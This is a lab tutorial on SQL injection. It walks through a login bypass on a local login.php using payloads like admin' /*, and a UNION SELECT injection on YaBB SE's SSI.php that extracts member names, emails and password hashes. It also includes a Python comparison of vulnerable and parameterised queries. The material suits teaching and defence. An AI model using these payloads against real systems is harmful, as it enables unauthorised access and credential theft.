I. Manipulating login.php Script
 Open the terminal and type (without prepending prompt symbols):
$ su -
These commands will start all needed services in the background.
 Open the browser and check http://localhost/phpmyadmin/.
 Have a look at the database userdb that our login.php script is accessing.
 Have a look at login.php script. To do this, open another terminal and type:
$ vi login.php
or, in case you are not familiar with the vi text editor, you can use the more user-friendly mcedit (or any other editor you wish):
$ mcedit login.php
 If you want to see the submitted query to get more information, delete the prepending slashes in front of echo "$query";
 Now open the browser again and go to http://localhost/login.php. You will see a page similar to the one below:
 Enter the username admin, which we know exists. As you can see, we cannot log in due to the missing password.
 Now append a ' to the username to see if the script is vulnerable. The script generates an error, so we can move on.
 Enter admin' OR 1=1 as username and see what happens.
 From the query we can see that we have a closing single quote that was never opened.
 Enter admin 'OR 1='1 as username. Now the query is valid and we're in:
 To advance the attack you might want to check out /*, which comments out everything that follows. Enter admin' /* as username and check the query:
SELECT * FROM `userlist` WHERE `username` = 'admin' /*' AND `password` = ''
is what we entered, but only the part before /* is processed by the database. This is why the statement is valid.
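The following is an added example, not the tutorial's login.php: it rebuilds the same string-concatenated query in Python against an in-memory SQLite table (standing in for the MySQL userdb; the `admin` row and its password are constructed), and places the parameterised form next to it so the effect of the inputs from the steps above can be compared directly.

```python
import sqlite3

# Constructed stand-in for the tutorial's userdb.userlist table.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE userlist (username TEXT, password TEXT)")
    conn.execute("INSERT INTO userlist VALUES ('admin', 's3cret')")
    return conn

def login_vulnerable(conn, username, password):
    # Same construction as the tutorial's login.php: user input is glued
    # straight into the SQL text, so quotes and /* become SQL syntax.
    query = (f"SELECT * FROM userlist WHERE username = '{username}' "
             f"AND password = '{password}'")
    try:
        return conn.execute(query).fetchone() is not None
    except sqlite3.Error:
        # The stray quote from the "admin'" probe lands here: the database
        # raises a syntax error, which is what the script's error page shows.
        return None

def login_safe(conn, username, password):
    # Hardened form: placeholders send the input as data, never as SQL,
    # so "admin' /*" is compared literally against the username column.
    row = conn.execute(
        "SELECT * FROM userlist WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None
```

The return values distinguish a syntax error (None, the probe step) from no match (False) and a successful login (True).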
II. UNION SELECT
 We installed YABBSE under http://localhost/yabbse/. The vulnerable script is located at http://localhost/yabbse/SSI.php.
 Open the script in the console by typing:
$ vi /yabbse/SSI.php
or use whichever editor you want. Now move to line 222, where the query we are trying to manipulate is located.
 To get into the function recentTopics, call http://localhost/yabbse/SSI.php?func... In this query a variable $ID_MEMBER is processed. This is where we try to break in. We should now move to http://localhost/yabbse/SSI.php?func..._MEMBER=1' (notice the single quote at the end). This results in an error, so the script is potentially vulnerable to an SQL injection attack.
 From the error message we can see that a table lmr, referenced in the original query, is now missing. We search for the original query in the editor and append the missing part to our query.
 Go to http://localhost/yabbse/SSI.php?func...ics&ID_MEMBER= 1) LEFT JOIN yabbse_log_mark_read AS lmr ON (lmr.ID_BOARD=t.ID_BOARD AND lmr.ID_MEMBER=1) UNION SELECT ID_MEMBER, memberName FROM yabbse_members /*. From the error message we can see that the inserted SELECT statement doesn't have the same number of columns as the original one. We have to add something to make the counts equal.
 Move your browser to http://localhost/yabbse/SSI.php?func...ics&ID_MEMBER= 1 OR 1=1) LEFT JOIN yabbse_log_mark_read AS lmr ON (lmr.ID_BOARD=t.ID_BOARD AND lmr.ID_MEMBER=1 OR 1=1) UNION SELECT memberName, emailAddress, passwd, null, null, null, null, null, null, null, null, null FROM yabbse_members /*. Now we seem to have a valid query, but can only see the e-mail address:
 Have a look at line 223 and below. There is an HTML parser to be found that shows the result of our query. So what we have to do now is to rearrange our null placeholders.
 Move to http://localhost/yabbse/SSI.php?func...s&ID_MEMBER=1) LEFT JOIN yabbse_log_mark_read AS lmr ON (lmr.ID_BOARD=t.ID_BOARD AND lmr.ID_MEMBER=1 OR 1=1) UNION SELECT null, memberName, null, emailAddress, null, passwd,null,null,null,null,null,null FROM yabbse_members /*. There we are - we have managed to obtain all information we wanted:
 Return to the terminal opened at the beginning (or open a new one) and issue the commands:
$ su -
This will stop all services needed to pass through this tutorial.